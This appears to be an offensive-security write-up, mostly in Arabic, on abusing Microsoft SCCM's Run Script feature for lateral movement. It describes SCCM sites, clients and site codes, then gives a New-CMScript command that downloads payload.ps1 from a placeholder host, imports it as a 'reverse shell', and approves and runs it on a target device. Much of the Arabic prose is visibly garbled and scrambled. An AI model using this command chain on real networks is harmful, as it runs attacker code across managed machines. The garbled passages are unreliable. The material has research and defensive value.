Abusing Microsoft System

Center Configuration Manager

(sccm)
By Mazen Al-Faifi from Confidential Team
@0xiMazen - @ConfidentialTM
03rd of July, 2022
Contents
Introduction: ............................................................ 3
SCCM Infrastructure:................................................ 4
What is meant by Sites? ........................................... 5
SCCM Sites: .............................................................. 7
Clients in SCCM: ....................................................... 8
SCCM Site Code Naming: ......................................... 9
Abusing The Run Script Feature in SCCM: ............. 10
Configuration Manager CMScripts: ....................... 12
References: ............................................................ 16
‫‪Introduction:‬‬

‫الـ ‪ sccm‬هو أحد منتجات رشكة مايكروسوفت الشهي يف إدارة االنظمة‬

‫ونش أنظمة التشغيل والحماية ومميات‬‫اليامج ر‬
‫والتحكم عن بعد وتوزي ــع ر‬
‫منتش ر‬
‫بكية وتعود االسباب لعدم التسويق‬ ‫ر‬ ‫كثية جدا ‪ ،‬ومع ذلك ليس‬
‫لهذا المنتج بشكل جيد وايضا من الممكن القيام ببعض ممياته من دونه‪.‬‬

‫وأيضا هناك مميات ال تستطيع القيام بها بمنتجات اخرى غيه‪.‬‬

‫قبل ان نبدأ يف استغالل هذا المنتج علينا فهم طريقة عمله وبعض‬
‫االساسيات المهمة‪.‬‬
SCCM Infrastructure:

Central Administration Site

TIER 1

CAS Site Server

TIER 2

Primary Sites Primary Sites

TIER 3

Secondary Sites Secondary Sites

Figure1 - Hierarchy sites Central, Primary and secondary sites

What is meant by Sites?

Domain ‫ عند توفر‬، physical location ‫ هنا هو الـ‬Site ‫معن الـ‬

‫ بمعن انه عند‬Active Directory Site ‫ يصبح المسىم‬control
Active ‫ يخزن داخل الـ‬Physical location ‫ داخل هذا الـ‬AD ‫تثبيت‬
Configuration Partition ‫ وتحديدا يف‬Directory Database

Figure2 – Configuration Partition

Active ‫ وربطه بالـ‬Configuration Manager Server ‫عند ثبيت الـ‬
‫ وتشغيل جميع‬AD Site ‫ يقوم بقراءته وكأنه‬Directory Server
AD Site ‫المميات عىل كل ماهو بداخل هذا الـ‬

AD Site

Print Server
WSUS
DC Machine

Machine

:SCCM Sites ‫نأت النواع الـ‬

‫ ي‬Site ‫االساس لـ‬
‫ي‬ ‫بعد ان فهمنا ماهو المعن‬

Central Administration Site •

Primary Site •
Secondary Site •
Standalone Primary Site •
‫‪SCCM Sites:‬‬

‫‪Central Administration Site .1‬‬

‫الهرم كما‬
‫ي‬ ‫يأت يف قمة الهرم ويستخدم لمراقبة جميع الـ ‪ Sites‬يف التسلسل‬
‫ي‬
‫ر‬
‫هو موضح يف ‪ ،Figure 1‬ال يقوم بإدارة الـ ‪ Client‬بشكل مباش إنما يقوم‬
‫والن بدورها تحتوي عىل ‪ Clients‬و‬‫بادارة ومراقبة الـ ‪ Primary Sites‬ي‬
‫‪. Secondary Sites‬‬
‫‪Primary Site .2‬‬
‫يأت بعد الـ ‪ CAS‬ويعد مهم جدا يف الشبكات الكبية ذات اتصال جيد‬
‫ي‬
‫ويعتي داعم للـ ‪ ، CAS‬ويدعم ال‪ Secondary Site‬كتابع له فقط‪.‬‬
‫ر‬
‫‪Secondary Site .3‬‬
‫الن‬
‫عي الروابط ي‬
‫يتحكم يف توزي ــع المحتوى للـ ‪ Clients‬يف المواقع البعيدة ر‬
‫لها نطاق ترددي محدود للشبكة‪.‬‬
‫‪Standalone Primary Site .4‬‬
‫هذا النوع هو المستخدم يف هذا البحث‪ ،‬اليختلف كثيا عن ‪Site‬‬
‫‪ Primary‬االختالف هو انه قائم بنفسه ويستخدم يف الشبكات الصغية‬
‫الن تحتوي عىل عدد ‪ Clients‬قليل‪.‬‬‫ي‬
‫‪Clients in SCCM:‬‬

‫اليامج‬ ‫كما ذكرت سابقا بأن الفائدة الحقيقية لهذا المنتج هو التحكم ر‬
‫ونش ر‬
‫ومميات اخرى عىل االجهزة الطرفية وغيها‪ ،‬يجب علينا فهم هذا الجانب‬
‫بشكل جيد ليسهل علينا فيما بعد االستغالل‪.‬‬

‫‪Figure3 – Client from the perspective of the ConfigMgr‬‬

‫‪Figure4 – Client from the perspective of the Powersccm‬‬

‫عند الوصول اىل ‪ Site Server‬يجب ان يكون هناك ‪ Client‬ولديك‬

‫الصالحية عىل ما يسىم بـ ‪.Site Code‬‬
SCCM Site Code Naming:

‫ يف التسلسل‬ConfigMgr Site ‫ للتعريف عن‬Site Code ‫يستخدم الـ‬

.Figure1 ‫الهرم الذي رشحته سابقا‬
‫ي‬

Figure5 – Site Code (BUN)

‫ و الـ‬Site Code ‫الن سوف نحتاج اليها مثل الـ‬

‫بعد معرفتنا بأهم االشياء ي‬
‫ر‬
‫الشء والمحاوله للوصول اىل الـ‬
‫ نبدأ يف استغالل هذا ي‬Client name
‫ المستهدف‬Client

Confidential Machine BugsBunny Machine Mazen Machine

(Local Administrator) (Target)

‫‪Abusing The Run Script Feature in SCCM:‬‬

‫وصلنا للـ ‪ Site Server‬بيوزر ليس لديه صالحيات‪ ،‬علينا االن ان نرفع‬
‫الصالحيات اىل الـ ‪ Local Administrator‬ومحاولة االستغالل‬
 ConfigurationManager ‫ الـ‬Module ‫نتأكد من وجود‬

Figure6 – ConfigurationManager.psd1

‫ عن طريق الـ‬Site Server ‫ هو المسؤول عن ادارة الـ‬Module ‫هذا الـ‬

. PowerShell

Configuration ‫ نبحث عن‬Microsoft Documentation ‫يف موقع‬

‫ تفيدنا يف تشغيل الـ‬Cmdlets ‫ والبحث عن‬Manager PowerShell
. Scripts
‫‪Configuration Manager CMScripts:‬‬

‫• ‪New-CMScript‬‬
‫هذا االمر إلنشاء ‪ Script PowerShell‬جديد‬
‫• ‪Approve-CMScript‬‬
‫هذا االمر للموافقة عىل الـ ‪ Script‬الذي قمت بكتابته من قبل‬
‫• ‪Invoke-CMScript‬‬
‫هذا االمر لتشغيل االمر الذي قمت بكتابته والموافقه عليه‬
‫• ‪Get-CMScript‬‬
‫هذا االمر لعرض جميع ماقمت به فالسابق‬

‫جميع هذه االوامر يجب كتابتها داخل ‪Site Code Drive‬‬

 : Site Drive ‫للدخول اىل الـ‬
Import Module .1
Enter the site code name .2

‫لتنفيذ االوامر والعمل بشكل صحيح علينا ان نكون بصالحيات‬

nt authority/system
: ‫ ونطبق عليه جميع ماسبق‬script reverse shell ‫نقوم بإنشاء‬
New-CMScript -ScriptName <name> -Fast -ScriptText "powershell.exe invoke-webrequest
http://ip/payload.ps1 -outfile C:\Users\blah\blah ; Import-Module C:\Users\blah\blah"
 ‫تم انشاء الـ ‪ ، Script‬للموافقه عليه علينا اخذ الـ ‪ Guid‬لهذا الـ ‪Script‬‬

‫نقوم بالموافقة عليه االن ‪:‬‬

‫‪Approve-CMScript -ScriptGuid FD44365B-A923-47AB-BCFF-57AEEE9AB583‬‬

 :‫ المستهدف وانتظار تنفيذ االمر‬Client ‫ونقوم بتشغيله عىل الـ‬

Invoke-CMScript -ScriptGuid FD44365B-A923-47AB-BCFF-57AEEE9AB583 -Device (Get-

CMDevice -Name MAZEN)
References:

{1} https://docs.microsoft.com/en-
us/powershell/module/configurationmanager/?view=scc
m-ps
{2} https://docs.microsoft.com/en-
us/powershell/module/configurationmanager/new-
cmscript?view=sccm-ps
{3}https://www.youtube.com/watch?v=ZQeRyaYNH4E&li
st=PLcRhfKiWZmM85PcV4YOsGEJ4W8i0bxAs6
{4} https://setupconfigmgr.com/deploy-the-
configuration-manager-client-agent-to-windows-
computers-in-sccm